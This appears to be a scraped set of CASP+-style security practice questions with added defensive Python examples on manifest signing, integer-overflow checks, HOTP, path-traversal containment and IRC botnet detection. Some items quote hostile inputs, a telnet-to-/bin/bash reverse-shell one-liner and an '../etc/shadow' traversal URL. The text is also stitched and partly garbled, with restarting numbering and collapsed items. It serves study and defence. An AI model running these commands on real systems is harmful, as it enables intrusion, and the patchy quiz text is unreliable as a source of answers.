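    "auth.py": b"def login(u, p):\n    return check(u, p)\n",
    "report.py": b"def render(data):\n    return str(data)\n",
}

# Signing key held only by the release pipeline (assumed, not from the page).
RELEASE_KEY = b"release-pipeline-secret-key"


def hash_manifest(modules):
    """Bare manifest: module name -> SHA-256 hex digest.

    SHA-256 is used rather than MD5 (which is collision-broken), but the
    weakness shown below is independent of the hash: nothing authenticates
    the manifest itself.
    """
    return {name: hashlib.sha256(data).hexdigest()
            for name, data in sorted(modules.items())}


def sign_manifest(manifest, key):
    """Signature over the canonical JSON form of the manifest."""
    canonical = json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(key, canonical, hashlib.sha256).hexdigest()


def verify_hashes(modules, manifest):
    """Bare-hash check: passes whenever the manifest matches the modules."""
    return hash_manifest(modules) == manifest


def verify_signed(modules, manifest, signature, key):
    """Signed check: manifest must match the modules AND carry a valid signature."""
    expected = sign_manifest(manifest, key)
    return hmac.compare_digest(expected, signature) and hash_manifest(modules) == manifest


def tamper(modules):
    """Attacker with write access backdoors a module and regenerates the hash list."""
    tampered = dict(modules)
    tampered["auth.py"] = b"def login(u, p):\n    return True  # backdoor\n"
    return tampered, hash_manifest(tampered)


def demo():
    manifest = hash_manifest(MODULES)
    signature = sign_manifest(manifest, RELEASE_KEY)
    tampered, forged_manifest = tamper(MODULES)
    return {
        "clean_hash_ok": verify_hashes(MODULES, manifest),
        "clean_signed_ok": verify_signed(MODULES, manifest, signature, RELEASE_KEY),
        # The attacker regenerated the hashes, so the bare check still passes.
        "tampered_hash_ok": verify_hashes(tampered, forged_manifest),
        # The old signature no longer covers the forged manifest, and the
        # attacker cannot produce a new one without RELEASE_KEY.
        "tampered_signed_ok": verify_signed(tampered, forged_manifest, signature, RELEASE_KEY),
    }


if __name__ == "__main__":
    print(demo())
```

The verifier must check both halves: that the signature is valid for the manifest and that the manifest matches the modules. Checking only the hashes, however strong the hash, leaves the manifest as a second file the attacker simply rewrites.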
20. A software assurance analyst reviews an SSH daemon's source code and sees the following:

    nresp = packet_get_int();
    if (nresp > 0) {
        response = xmalloc(nresp * sizeof(char *));
        for (i = 0; i < nresp; i++)
            response[i] = packet_get_string(NULL);
    }

Based on this code snippet, which of the following attacks is most likely to succeed?
A. Race condition
B. Integer overflow
C. Driver shimming
D. Cross-site scripting

21. A security analyst has concerns about malware on an endpoint. The analyst prevents the malware from detonating by modifying the kernel's responses to various system calls. As a test, the analyst modifies a Windows server to respond to system calls as if it were a Linux server. In another test, the analyst modifies the OS to prevent the malware from identifying target files. Which of the following techniques is the analyst most likely using?
A. Honeypot
B. Deception
C. Simulators
D. Sandboxing

22. A shipping company that is trying to eliminate entire classes of threats is developing an SELinux policy to ensure its custom Android devices are used exclusively for package tracking. After compiling and implementing the policy, in which of the following modes must the company ensure the devices are configured to run?
A. Enforcing
B. Protecting
C. Permissive
D. Mandatory

23. A company is deploying multiple VPNs to support supplier connections into its extranet applications. The network security standard requires all remote devices to have:
- Up-to-date antivirus
- A HIDS
- An up-to-date and patched OS
Which of the following technologies should the company deploy to meet its security objectives? (Select TWO)
A. NAC
B. Reverse proxy
C. NIDS
D. WAF
E. NGFW
F. Bastion host

24. Which of the following communications protocols is used to create PANs with small, low-power radios and supports a large number of nodes?
A. CAN
B. DNP3
C. Modbus
D. WiFi
E. Zigbee
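The snippet in question 20 above takes an attacker-controlled count from the packet and multiplies it by sizeof(char*) before allocating, with nresp > 0 as the only guard. The added example below, which is not code from the quiz page or from any SSH implementation, models that arithmetic in Python for an assumed 32-bit build (sizeof(char*) is 4 and size_t wraps at 2^32) and puts a hardened check beside it: bound the count to what the protocol can legitimately carry, and refuse any count whose product with the element size does not fit in size_t. MAX_RESPONSES is an assumed bound, not a value from the page.

```python
"""Model of the allocation-size arithmetic in the SSH snippet above.

Added example, not code from the quiz page or from any SSH daemon. It
assumes a 32-bit build: sizeof(char*) == 4 and size_t wraps at 2**32, so
the C expression nresp * sizeof(char*) is modelled as a Python product
reduced modulo 2**32. MAX_RESPONSES is an assumed protocol bound.
"""
SIZEOF_PTR = 4
SIZE_T_MAX = 2 ** 32 - 1
MAX_RESPONSES = 256  # assumed sane upper bound on responses in one packet


def c_alloc_size(nresp):
    """Bytes actually requested by xmalloc(nresp*sizeof(char*)) after wraparound."""
    return (nresp * SIZEOF_PTR) & SIZE_T_MAX


def bytes_written(nresp):
    """Bytes the loop  for (i = 0; i < nresp; i++) response[i] = ...  tries to write."""
    return nresp * SIZEOF_PTR


def vulnerable_check(nresp):
    """The snippet's only guard: a positive count is accepted as-is."""
    return nresp > 0


def hardened_check(nresp):
    """Reject counts that are non-positive, above the protocol bound, or whose
    product with the element size cannot be represented in size_t."""
    if nresp <= 0 or nresp > MAX_RESPONSES:
        return False
    return nresp <= SIZE_T_MAX // SIZEOF_PTR  # the overflow-safe multiply test


def analyse(nresp):
    """Compare what the vulnerable path allocates against what it then writes."""
    allocated = c_alloc_size(nresp)
    written = bytes_written(nresp)
    return {
        "passes_vulnerable_check": vulnerable_check(nresp),
        "passes_hardened_check": hardened_check(nresp),
        "bytes_allocated": allocated,
        "bytes_written": written,
        # A heap overflow needs the request to get past the guard and the
        # loop to write past the (wrapped) allocation.
        "heap_overflow": vulnerable_check(nresp) and written > allocated,
    }


if __name__ == "__main__":
    for n in (3, 0x40000100):
        print(hex(n), analyse(n))
```

With nresp = 0x40000100 the product 0x100000400 wraps to 0x400, so xmalloc returns a 1 KB buffer while the loop stores far more pointers into it. Even on a 64-bit build, where a 32-bit count cannot wrap an 8-byte multiply, the bound on the count is still what stops a client from forcing an enormous allocation, so both halves of hardened_check belong in the fix.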
25. A digital forensics expert has obtained an ARM binary suspected of including malicious behavior. The expert would like to trace and analyze the ARM binary's execution. Which of the following tools would best support this effort?
A. FTK Imager
B. objdump
C. Ghidra
D. OllyDbg

1. In preparation for the holiday season, a company redesigned the system that manages retail sales and moved it to a cloud service provider. The new infrastructure did not meet the company's availability requirements. During a postmortem analysis, the following issues were highlighted:
- International users reported latency when images on the web page were initially loading
- During times of report processing, users reported issues with inventory when attempting to place orders
- Despite the fact that ten new API servers were added, the load across servers was heavy at peak times
Which of the following infrastructure design changes would be best for the organization to implement to avoid these issues in the future?
A. Serve static content via distributed CDNs, create a read replica of the central database and pull reports from there, and autoscale API servers based on performance
B. Serve static content from object storage across different regions, increase the size of the managed relational database, and distribute the ten API servers across multiple regions
C. Serve images from an object storage bucket with infrequent read times, replicate the database across different regions, and dynamically create API servers based on load
D. Increase the bandwidth for the server that delivers images, use a CDN, change the database to a non-relational database, and split the ten API servers across two load balancers

2. Due to budget constraints, an organization created a policy that only permits vulnerabilities rated high and critical according to CVSS to be fixed or mitigated.
A security analyst notices that many vulnerabilities that were previously scored as medium are now breaching higher thresholds. Upon further investigation, the analyst notices certain ratings are not aligned with the approved system categorization. Which of the following can the analyst do to get a better picture of the risk while adhering to the organization's policy?
A. Align the attack vectors to the predetermined system categorization
B. Align the exploitability metrics to the predetermined system categorization
C. Align the remediation levels to the predetermined system categorization
D. Align the impact subscore requirements to the predetermined system categorization

3. A DevOps team has deployed databases, event-driven services, and an API gateway as a PaaS solution that will support a new billing system. Which of the following security responsibilities will the DevOps team need to perform?
A. Securely configure the authentication mechanisms
B. Upgrade the service as part of the life-cycle management
C. Execute port scanning against the services
D. Patch the infrastructure at the OS

4. In comparison to other types of alternative processing sites that may be invoked as part of a disaster recovery, cold sites are different because they:
A. are the quickest way to restore business
B. are geographically separated from the company's primary facility
C. provide workstations and read-only domain controllers
D. have basic utility coverage, including power and water
E. are generally the least costly to sustain

5. A company is migrating from company-owned phones to a BYOD strategy for mobile devices. The pilot program will start with the executive management team and be rolled out to the rest of the staff in phases. The company's CFO loses a phone multiple times a year. Which of the following will most likely secure the data on the lost device?
A. Remotely wipe the device
B. Set up different profiles based on the person's risk
C. Require a VPN to be active to access company data
D. Require MFA to access company applications

6. A security engineer is evaluating a low-cost method to detect ransomware attacks. The security engineer needs a way to detect when a ransomware attack is able to access certain files located on a file server. Which of the following options best fits the security engineer's needs?
A. Installing open-source HIPS on the file server
B. Installing an open-source sandbox
C. Moving the file server behind an open-source IPS engine
D. Implementing decoy files using open-source tools

7. A company wants to harden its network infrastructure and has established the following requirements for its physical network devices:
- Active Directory authentication and authorization should be attempted first, but local authentication and authorization is permitted if Active Directory fails or is unavailable
- An event-based authentication factor must be used
- Administrative actions must be logged
Which of the following should the company implement to meet the requirements? (Select TWO)
A. HOTP
B. EAP
C. TOTP
D. SSH
E. TACACS+
F. RADIUS

8. In order to save money, a company has moved its data to the cloud with a low-cost provider. The company did not perform a security review prior to the move; however, the company requires all of its data to be stored within the country where the headquarters is located. A new employee on the security team has been asked to evaluate the current provider against the most important requirements. The current cloud provider that the company is using offers:
- Only multi-tenant cloud hosting
- Minimal physical security
- Few access controls
- No access to the data center
The following information has been uncovered:
- The company is located in a known floodplain, which flooded last year
- Government regulations require data to be stored within the country
Which of the following should be addressed first?
A. Establish a new MOU with the cloud provider
B. Update the DRP to account for natural disasters
C. Establish a new SLA with the cloud provider
D. Provision services according to the appropriate legal requirements

9. A network administrator who manages a Linux web server notices the following traffic:

    http://comptia.org/../../../../etc/shadow

Which of the following is the best action for the network administrator to take to defend against this type of web attack?
A. Validate the server input and append the input to the base directory path
B. Validate the server certificate and trust chain
C. Validate that MFA is enabled on the server for all user accounts
D. Validate that the server is not deployed with default account credentials

10. A security analyst sees that a hacker has discovered some keys and they are being made available on a public website. The security analyst is then able to successfully decrypt the data using the keys from the website. Which of the following should the security analyst recommend to protect the affected data?
A. Key revocation
B. Key rotation
C. Zeroization
D. Key escrow
E. Cryptographic obfuscation

11. A security architect is working with a new customer to find a vulnerability assessment solution that meets the following requirements:
- Fast scanning
- The fewest false positives possible
- Signature-based
- A low impact on servers when performing a scan
In addition, the customer has several screened subnets, VLANs, and branch offices. Which of the following will best meet the customer's needs?
A. Unauthenticated scanning
B. Passive scanning
C. Authenticated scanning
D. Agent-based scanning

12. A multinational organization was hacked, and the incident response team's timely action prevented a major disaster. Following the event, the team created an after-action report. Which of the following is the primary goal of an after-action review?
A. To gather evidence for subsequent legal action
B. To determine the identity of the attacker
C. To identify ways to improve the response process
D. To create a plan of action and milestones
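Question 7 above asks for an event-based authentication factor. HOTP (RFC 4226) is the event-based one: its moving factor is a counter that advances each time a code is used, whereas TOTP derives the counter from the clock. The added example below, which is not code from the quiz page, implements HOTP with the standard library together with a verifier that keeps the server-side counter, accepts a code within a small look-ahead window so a few skipped presses on the token do not lock the user out, and rejects replay of a counter value that has already been consumed. The secret is the RFC 4226 test-vector secret; LOOKAHEAD is an assumed policy value.

```python
"""HOTP (RFC 4226) generator and counter-based verifier.

Added example for the event-based-factor question above, not code from the
quiz page. The secret below is the RFC 4226 test-vector secret; LOOKAHEAD
is an assumed policy value.
"""
import hashlib
import hmac
import struct

LOOKAHEAD = 5  # assumed: how many skipped counter values the server tolerates


def hotp(secret, counter, digits=6):
    """RFC 4226: HMAC-SHA1 over the 8-byte big-endian counter, dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = ((mac[offset] & 0x7F) << 24
            | mac[offset + 1] << 16
            | mac[offset + 2] << 8
            | mac[offset + 3])
    return str(code % 10 ** digits).zfill(digits)


def totp(secret, unix_time, step=30, digits=6):
    """TOTP is HOTP with the counter taken from the clock; shown only for contrast."""
    return hotp(secret, unix_time // step, digits)


class HotpVerifier:
    """Server-side state for one token: the next counter value it expects."""

    def __init__(self, secret, lookahead=LOOKAHEAD):
        self.secret = secret
        self.counter = 0
        self.lookahead = lookahead

    def verify(self, code):
        # Search forward from the expected counter only. Values behind the
        # counter have been consumed, so a captured code cannot be replayed.
        for c in range(self.counter, self.counter + self.lookahead):
            if hmac.compare_digest(hotp(self.secret, c), code):
                self.counter = c + 1  # resynchronise and burn the used value
                return True
        return False


if __name__ == "__main__":
    secret = b"12345678901234567890"  # RFC 4226 test secret
    print([hotp(secret, c) for c in range(3)])
```

The look-ahead keeps a token usable after a few accidental presses; keep it small, since every extra value in the window is one more code an online guesser could hit.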
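The request in question 9 above carries ../ segments that climb out of the document root. The added example below, which is not code from the quiz page, shows the naive concatenation that lets the traversal through next to a resolver that decodes the path once, joins it under the base directory, normalises the result lexically and then refuses anything that does not stay under the base. WEB_ROOT is an assumed document root, and normalisation is lexical so the example runs offline.

```python
"""Path-traversal defence: keep a requested file inside the document root.

Added example for the traversal question above, not code from the quiz
page. WEB_ROOT is an assumed document root; paths are normalised lexically
so nothing touches the disk.
"""
import posixpath
from typing import Optional
from urllib.parse import unquote, urlsplit

WEB_ROOT = "/var/www/html"  # assumed document root


def naive_resolve(url, base=WEB_ROOT):
    """The vulnerable pattern: concatenate and let the OS interpret '..'."""
    raw = base + urlsplit(url).path
    return posixpath.normpath(raw)  # what the kernel would actually open


def safe_resolve(url, base=WEB_ROOT) -> Optional[str]:
    """Decode once, join under base, normalise, then enforce containment."""
    path = unquote(urlsplit(url).path)  # %2e%2e%2f -> ../ (single decode only)
    if "\x00" in path:                  # a NUL would truncate a C filename
        return None
    base = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base, path.lstrip("/")))
    if candidate != base and not candidate.startswith(base + "/"):
        return None                     # escaped the document root
    return candidate


if __name__ == "__main__":
    for u in ("http://comptia.org/../../../../etc/shadow", "http://comptia.org/index.html"):
        print(u, "->", naive_resolve(u), "|", safe_resolve(u))
```

Appending the input to the base path is necessary but not sufficient: without normalisation, "/var/www/html" + "/../../../../etc/shadow" still opens /etc/shadow, which is what naive_resolve shows. On a live server, run os.path.realpath on the candidate before the containment check so a symlink inside the root cannot point outside it.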
13. Which of the following is used to assess compliance with internal and external requirements?
A. RACI matrix
B. Audit report
C. BCP
D. After-action report
A RACI matrix is a simple, effective means for defining project roles and responsibilities, providing a comprehensive chart of who is responsible, accountable, consulted, and informed every step of the way.

14. A law firm experienced a breach in which access was gained to a secure server. During an investigation to determine how the breach occurred, an employee admitted to clicking on a spear-phishing link. A security analyst reviewed the event logs and found the following:
- PAM had not been bypassed
- DLP did not trigger any alerts
- The antivirus was updated to the most current signature
Which of the following most likely occurred?
A. Exfiltration
B. Privilege escalation
C. Lateral movement
D. Exploitation

15. A bank is working with a security architect to find the best solution to detect database management system compromises. The solution should meet the following requirements:
- Work at the application layer
- Send alerts on attacks from both privileged and malicious users
- Have a very low false positive rate
Which of the following should the architect recommend?
A. FIM
B. WAF
C. NIPS
D. UTM
E. DAM
Database Activity Monitoring (DAM): a DAM solution is a security tool that monitors and analyzes database activity for signs of compromise or malicious activity. It works at the application layer and can send alerts on attacks from both privileged and malicious users. A DAM solution can also have a very low false positive rate, making it an effective tool for detecting database management system compromises.

16. A security architect is implementing a web application that uses a database back end.
Prior to production, the architect is concerned about the possibility of XSS attacks and wants to identify security controls that could be put in place to prevent these attacks. Which of the following sources could the architect consult to address this security concern?
A. OWASP
B. OVAL
C. IEEE
D. SDLC
OVAL: International in scope and free for public use, OVAL is an information security community effort to standardize how to assess and report upon the machine state of computer systems. OVAL includes a language to encode system details, and an assortment of content repositories held throughout the community. Tools and services that use OVAL for the three steps of system assessment (representing system information, expressing specific machine states, and reporting the results of an assessment) provide enterprises with accurate, consistent, and actionable information so they may improve their security. Use of OVAL also provides for reliable and reproducible information assurance metrics and enables interoperability and automation among security tools and services.
IEEE: With an active portfolio of nearly 1,300 standards and projects under development, IEEE is a leading developer of industry standards in a broad range of technologies that drive the functionality, capabilities, and interoperability of products and services, transforming how people live, work, and communicate.

17. A product manager at a new company needs to ensure the development team produces high-quality code on time. The manager has decided to implement an agile development approach instead of waterfall. Which of the following are reasons to choose an agile development approach?ased (Select TWO)
A. Budgeting and creating a timeline for the entire project is often more straightforward using an agile approach rather than waterfall
B. The product manager would like to produce code in linear phases
C. The product manager gives the developers more autonomy to write quality code prior to deployment
D. An agile approach incorporates greater application security in the development process than a waterfall approach does
E. The product manager prefers to have code iteratively tested throughout development
F. The scope of work is expected to evolve during the lifetime of project development

18. A security operations center analyst is investigating anomalous activity between a database server and an unknown external IP address and gathers the following data:
- dbadmin last logged in at 7:30 AM and logged out at 8:05 AM
- A persistent TCP/6667 connection to the external address was established at 7:55 AM. The connection is still alive
- Other than the bytes transferred to keep the connection alive, only a few KB of data have been transferred every hour since the start of the connection
- A sample outbound request payload from the PCAP showed the ASCII content "JOIN #community"
Which of the following is the most likely root cause?
A. The dbadmin user is consulting the community for help via Internet Relay Chat
B. A botnet Trojan is installed on the database server
C. The system has been hijacked for cryptocurrency mining
D. A SQLi was used to exfiltrate data from the database server

19. Users are reporting intermittent access issues with a new cloud application that was recently added to the network. Upon investigation, the security administrator notices the human resources department is able to run required queries with the new application, but the marketing department is unable to pull any needed reports on various resources using the new application. Which of the following most likely needs to be done to avoid this in the future?
A. Modify the ACLs
B. Update the marketing department's browser
C. Review the Active Directory
D. Reconfigure the WAF
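The indicators in question 18 above (a persistent outbound session on TCP/6667, a trickle of bytes per hour, and an IRC JOIN in the payload) are the classic profile of an IRC-controlled bot. The added example below, which is not code from the quiz page, scores constructed flow records against those indicators so that the database-server flow stands out from a short HTTPS session, from a legitimate but chatty IRC connection, and from a long idle TLS keepalive. The flow records, the thresholds and the port list are assumptions.

```python
"""Scoring outbound flows for IRC command-and-control indicators.

Added example for the IRC question above, not code from the quiz page.
Flow records are constructed; thresholds and the port list are assumptions.
"""
import re
from dataclasses import dataclass
from typing import List

IRC_PORTS = set(range(6660, 6670)) | {6697, 7000}   # assumed common IRC ports
IRC_VERB = re.compile(rb"^(NICK|USER|JOIN|PRIVMSG|PONG)\b", re.M)
LONG_LIVED_S = 3600         # assumed: a session alive for an hour or more
LOW_VOLUME_BPH = 16 * 1024  # assumed: under 16 KB/hour is "keepalive plus a trickle"


@dataclass
class Flow:
    src: str
    dst: str
    dport: int
    duration_s: int
    bytes_out: int
    payload_sample: bytes


def score_flow(f: Flow) -> List[str]:
    """Return the matched indicators; an empty list means nothing suspicious."""
    reasons = []
    if f.dport in IRC_PORTS:
        reasons.append("irc_port")
    if IRC_VERB.search(f.payload_sample):
        reasons.append("irc_command")
    hours = max(f.duration_s, 1) / 3600
    if f.duration_s >= LONG_LIVED_S and f.bytes_out / hours < LOW_VOLUME_BPH:
        reasons.append("long_lived_low_volume")
    return reasons


def find_c2_candidates(flows, min_indicators=3):
    """Flows matching at least min_indicators indicators, with their reasons."""
    hits = []
    for f in flows:
        reasons = score_flow(f)
        if len(reasons) >= min_indicators:
            hits.append((f, reasons))
    return hits


# Constructed sample: the quiz scenario plus three benign-looking flows.
SAMPLE_FLOWS = [
    Flow("10.0.0.50", "203.0.113.9", 6667, 5 * 3600, 20 * 1024, b"JOIN #community\r\n"),
    Flow("10.0.0.50", "203.0.113.10", 443, 12, 48 * 1024, b"\x16\x03\x01"),
    Flow("10.0.0.50", "203.0.113.11", 6667, 120, 90 * 1024, b"PRIVMSG #dev :logs attached\r\n"),
    Flow("10.0.0.50", "203.0.113.12", 443, 4 * 3600, 8 * 1024, b"\x17\x03\x03"),
]


if __name__ == "__main__":
    for flow, reasons in find_c2_candidates(SAMPLE_FLOWS):
        print(flow.dst, flow.dport, reasons)
```

No single indicator is conclusive: an idle TLS keepalive is long-lived and low-volume, and a human on IRC produces port and command matches. Requiring all three together is what isolates the beaconing bot.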
20. A security administrator sees several hundred entries in a web server security log that are similar to the following:

    Staten Island, New York, United States was blocked 10 minutes for exceeding the maximum requests per minute at URL https://companysite.net/xmlrpc.php 6/7/2021 10:05:15 AM, IP: 151.205.188.74 Hostname: pool-151.205.188.74-nycmny.isp.net Status: 503 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Chrome/90.0.44 Safari/537.36 WHOIS: ISP.net (NET-151-196-0-0-1) 151.196.0.0 - 151.205.255.255

The network source varies, but the URL, status, and user agent remain the same. Which of the following would best protect the web server without blocking legitimate traffic?
A. Automate the addition of bot IP addresses into a deny list for the web host
B. Script the daily collection of the WHOIS ranges to add to the WAF as a denied ACL
C. Replace the file xmlrpc.php with a honeypot to collect further IOCs
D. Block every subnet that is identified as having a bot that is a source of the traffic

21. Which of the following is the most important cloud-specific risk from the CSP's viewpoint?
A. Insecure data deletion
B. CI/CD deployment failure
C. Resource exhaustion
D. Management plane breach

22. A security engineer is creating a single CSR for the following web server hostnames:
- www.int.internal
- www.company.com
- home.internal
- www.internal
Which of the following would meet the requirement?
A. CN
B. SAN
C. CA
D. CRL
E. Issuer

23. An organization has been leveraging RC4 to protect the confidentiality of a continuous, high-throughput 4K video stream but must upgrade to a more modern cipher. The new cipher must maximize speed, particularly on endpoints without crypto instruction sets or coprocessors. Which of the following is most likely to meet the organization's requirements?
A. Blowfish
B. AES-GCM
C. AES-CBC
D. ECDSA
E. ChaCha20
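The log entries in question 20 above come from a rate limiter: the source changes while the URL, status and user agent stay fixed. The added example below, which is not code from the quiz page, parses such entries, groups them by the (URL, user agent) signature so the campaign stays visible as the source addresses change, lists the addresses that would feed a per-host deny list, and sizes the WHOIS range quoted in the entry so the collateral of a range-wide block can be seen. The first log line is the one quoted in the question; the other lines and their addresses are constructed from documentation address space.

```python
"""Parse rate-limiter log entries, group by request signature, size WHOIS ranges.

Added example for the xmlrpc.php question above, not code from the quiz
page. The first line is the entry quoted in the question; the other lines
and their addresses are constructed.
"""
import ipaddress
import re
from collections import defaultdict

LOG_RE = re.compile(
    r"^(?P<geo>.+?) was blocked (?P<minutes>\d+) minutes for .+? at URL (?P<url>\S+) "
    r"(?P<ts>\S+ \S+ [AP]M), IP: (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) "
    r"Hostname: (?P<host>\S+) Status: (?P<status>\d{3}) (?P<ua>.+)$"
)
RANGE_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3}) - (\d{1,3}(?:\.\d{1,3}){3})")

UA = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 "
      "Chrome/90.0.44 Safari/537.36")
SAMPLE_LOG = [
    "Staten Island, New York, United States was blocked 10 minutes for exceeding the maximum "
    "requests per minute at URL https://companysite.net/xmlrpc.php 6/7/2021 10:05:15 AM, "
    "IP: 151.205.188.74 Hostname: pool-151.205.188.74-nycmny.isp.net Status: 503 " + UA,
    # Constructed entries below: same URL and user agent, different sources.
    "Lyon, France was blocked 10 minutes for exceeding the maximum requests per minute at URL "
    "https://companysite.net/xmlrpc.php 6/7/2021 10:06:02 AM, IP: 203.0.113.17 "
    "Hostname: host-17.example.net Status: 503 " + UA,
    "Osaka, Japan was blocked 10 minutes for exceeding the maximum requests per minute at URL "
    "https://companysite.net/xmlrpc.php 6/7/2021 10:06:40 AM, IP: 198.51.100.9 "
    "Hostname: host-9.example.org Status: 503 " + UA,
    # Constructed unrelated entry: different URL and user agent.
    "Austin, Texas, United States was blocked 10 minutes for exceeding the maximum requests per "
    "minute at URL https://companysite.net/wp-login.php 6/7/2021 10:07:11 AM, IP: 192.0.2.44 "
    "Hostname: host-44.example.com Status: 503 curl/7.68.0",
]
WHOIS_LINE = "WHOIS: ISP.net (NET-151-196-0-0-1) 151.196.0.0 - 151.205.255.255"


def parse_entries(lines):
    """Return one dict per line that matches the rate-limiter format; skip the rest."""
    out = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            out.append(m.groupdict())
    return out


def campaign_signatures(entries):
    """Group source IPs by (URL, user agent): the part of the pattern that does not change."""
    sigs = defaultdict(set)
    for e in entries:
        sigs[(e["url"], e["ua"])].add(e["ip"])
    return {k: sorted(v) for k, v in sigs.items()}


def deny_list_for(entries, url):
    """Addresses that an automated per-host deny list would pick up for one targeted URL."""
    return sorted({e["ip"] for e in entries if e["url"] == url})


def whois_range_size(whois_line):
    """Number of addresses a block of the whole WHOIS range would cover."""
    lo, hi = RANGE_RE.search(whois_line).groups()
    nets = ipaddress.summarize_address_range(ipaddress.ip_address(lo), ipaddress.ip_address(hi))
    return sum(n.num_addresses for n in nets)


if __name__ == "__main__":
    entries = parse_entries(SAMPLE_LOG)
    for sig, ips in campaign_signatures(entries).items():
        print(sig[0], len(ips), "sources")
    print("range-wide block would cover", whois_range_size(WHOIS_LINE), "addresses")
```

The signature grouping is what makes the campaign countable as sources rotate; the range size shows why a WHOIS-wide ACL is a blunt instrument, since the single range in the quoted entry spans 655,360 addresses belonging to an ISP's customer pool.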
24. A company's CISO wants to prevent the company from being the target of ransomware. The company's IT assets need to be protected. Which of the following are the most secure options to address these concerns? (Select THREE)
A. Strong authentication
B. Application control
C. EDR
D. NGFW
E. IDS
F. Host-based firewall
G. Antivirus
H. Sandboxing

25. An employee's device was missing for 96 hours before being reported. The employee called the help desk to ask for another device. Which of the following phases of the incident response cycle needs improvement?
A. Resolution
B. Investigation
C. Containment
D. Preparation

1. A CSP, which wants to compete in the market, has been approaching companies in an attempt to gain business. The CSP is able to provide the same uptime as other CSPs at a markedly reduced cost. Which of the following would be the most significant business risk to a company that signs a contract with this CSP?
A. Geographic location
B. Vendor lock-in
C. Control plane breach
D. Resource exhaustion

2. A penetration tester is testing a company's login form for a web application using a list of known usernames and a common password list. According to a brute-force utility, the pentester needs to provide the tool with the proper headers, the POST URL with variable names, and the error string returned with an improper login. Which of the following would best help the tester to gather this information? (Select TWO)
A. A tcpdump from the web server
B. The logs from the web server
C. An HTTP interceptor
D. The website certificate viewed via the web browser
E. The inspect feature of the web browser
F. The view source feature of the web browser

3. A pentester inputs the following command:

    telnet 192.168.99.254 343 | /bin/bash | telnet 192.168.99.254 344

This command will allow the pentester to establish a:
A. reverse shell
B. network pivot
C. port mirror
D. proxy chain
4. A company wants to improve its active protection capabilities against unknown and zero-day malware. Which of the following is the most likely secure solution?
A. App allow list
B. Endpoint log collection
C. Sandbox detonation
D. HIDS
E. NIDS

5. A security administrator needs to implement an X.509 solution for multiple sites within the HR department. This solution would need to secure all subdomains associated with the domain name of the main HR web server. Which of the following would need to be implemented to properly secure the sites and provide easier private key management?
A. Certificate revocation list
B. Wildcard certificate
C. Digital signature
D. Certificate pinning
E. Registration authority

6. An organization developed an IRP. Which of the following would be best to assess the effectiveness of the plan?
A. Creating a playbook
B. Performing a tabletop exercise
C. Establishing role succession and call lists
D. Requesting a 3rd-party review
E. Generating a checklist by organizational unit

7. An organization recently completed a security controls assessment. The results highlighted the following vulnerabilities:
- Out-of-date definitions
- Misconfigured OSs
- An inability to detect active attacks
- Unimpeded access to critical servers' USB ports
Which of the following will most likely reduce the risks that were identified by the assessment team?
A. Create an information security program that addresses user training, perform weekly audits of user workstations, and utilize a centralized configuration management program
B. Install EDR on endpoints, configure group policy, lock server room doors, and install a camera system with guards watching 24/7
C. Update antivirus definitions, install an NGFW with logging enabled, use USB port lockers, and run SCAP scans weekly
D. Implement a vulnerability management program and a SIEM tool with alerting, install a badge system with zones, and restrict privileged access
Which of the following is a security concern for DNP3? A. Authentication is not allocated B. Free-form messages require support C. It is an open source protocol D. Available function codes are not standardized Points: 0/1 9. A company processes sensitive cardholder information that is stored in an internal production database and accessed by internet-facing web servers. The company’s CISO is concerned with the risks related to sensitive data exposure and wants to implement tokenization of sensitive information at the record level. The company implements a one-to-many mapping of primary credit card numbers to temporary credit card numbers. Which of the following should the CISO consider in a tokenization system? A. Salted hashes B. Data field watermarking C. Single-use translation D. Field tagging Points: 0/1 10. A user in the finace department uses a laptop to store a spreedsheet that contains confidential financial information for the company. Which of the following would be the best way to protect the file while the user travels between locations? (Select TWO) A. Place an ACL on the file to deny access to everyone B. Store the file in the user profile C. Enable access logging on the file D. Place an ACL on the file to only allow access to specified users E. Back up the file to an encrypted flash drive F. Encrypt the laptop with FDE Points: 0/1 11. A forensic investigator started the process of gathering evidence on a laptop in response to an incident. the investigator took a snapshot of the hard drive, copied relevant log files, and then performed a memory dump. Which of the following steps in the process should have occurred first? A. Copy relevant log files B. Clone the disk C. Preserve secure storage D. Collect the most volatile data Points: 0/1 12. A company wants to securely manage the APIs that were developed for its in-house apps. Previous penetration tests revealed that developers were embedding unencrypted passwords in the code. 
Which of the following can the company do to address this finding? (Select TWO) A. Implement user session logging B. Implement time-based API key management C. Use SOAP instead of restful services D. Implement complex, key-length API key management E. Incorporate a DAST into the DevSecOps process to identify the exposure of secrets F. Enforce MFA on the developers' workstations and production systems Points: 0/1 13. A firewall administrator needs to ensure all traffic across the company network is inspected. The administrator gathers data and finds the following information regarding the typical traffic in the network: Port Protocol Traffic in (bytes) Traffic out (bytes) % of traffic 80 TCP 1,250,482 2,165,482 3.12 443 TCP 58,395,746 75,947,219 91.4 ICMP 334,562 444,119.9 445 TCP 7,658,433 568,234 4.11 123 UDP 54,645 55,181.08 Which of the following is the best solution to ensure the admin can complete the assigned task? A. A full tunnel VPN B. Web content filtering C. SSL/TLS decryption D. An endpoint DLP solution Points: 0/1 14. An organization's senior security architect would like to develope cyberdefensive strategies based on standardized advarsary techniques, tactics, and procedures commonly observed. Which of the following would best support this objective? A. The Diamond Model of Intrusion Analysis B. Cloud sourced intelligence reporting C. OSINT analysis D. Deepfake generation E. MITRE ATT&CK Points: 0/1 15. An analyst received a list of IOCs from a government agency. The attack has the following characteristics: The attack starts with bulk phishing If a user clicks on the link, a dropper is downloaded to the computer Each of the malware samples has unique hashes tied to the user The analyst needs to identify whether existing endpoint controls are effective. Which of the following risk mitigation techniques should the analyst use? A. Detonate in a sandbox B. Blocklist the executable C. Deploy a honeypot onto the laptops D. Update the IRP Points: 0/1 16. 
